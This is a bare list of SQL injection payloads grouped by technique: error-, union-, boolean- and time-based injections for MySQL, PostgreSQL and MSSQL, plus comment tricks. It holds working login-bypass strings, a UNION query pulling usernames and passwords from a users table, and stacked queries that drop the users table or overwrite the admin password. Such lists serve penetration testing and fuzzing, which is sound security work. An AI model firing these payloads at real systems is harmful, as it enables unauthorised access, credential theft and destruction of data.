# SQL Injection Payloads

# Basic error-based
'
"
`
''
""
;
' --
" --
' #
" #
') --
") --
')) --

# OR-based
' OR '1'='1
" OR "1"="1
' OR '1'='1' --
" OR "1"="1" --
' OR 1=1 --
" OR 1=1 --
' OR 1=1#
" OR 1=1#
') OR ('1'='1
") OR ("1"="1
') OR '1'='1' --
admin' --
admin'/*

# AND-based
' AND '1'='1
" AND "1"="1
' AND 1=1 --
" AND 1=1 --
' AND '1'='2
" AND "1"="2
' AND 1=2 --
" AND 1=2 --

# UNION-based
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT username,password FROM users--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
1' ORDER BY 1--
1' ORDER BY 10--
1' ORDER BY 100--

# Time-based (MySQL)
' AND SLEEP(5)--
" AND SLEEP(5)--
') AND SLEEP(5)--
' AND SLEEP(5)#
1' AND SLEEP(5)#
' AND BENCHMARK(10000000,SHA1('test'))--

# Time-based (PostgreSQL)
' AND pg_sleep(5)--
'; SELECT pg_sleep(5)--
') AND pg_sleep(5)--

# Time-based (MSSQL)
'; WAITFOR DELAY '0:0:5'--
' AND WAITFOR DELAY '0:0:5'--
') WAITFOR DELAY '0:0:5'--

# Error-based extraction
' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--
' AND UPDATEXML(1,CONCAT(0x7e,VERSION()),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(VERSION(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

# Boolean-based
' AND 1=1 AND 'a'='a
' AND 1=2 AND 'a'='a
' AND (SELECT SUBSTRING(username,1,1) FROM users)='a'--

# Stacked queries
'; DROP TABLE users--
'; INSERT INTO users VALUES('hacker','hacked')--
'; UPDATE users SET password='hacked' WHERE username='admin'--

# Comments
/**/
/**_**/
--
#
;%00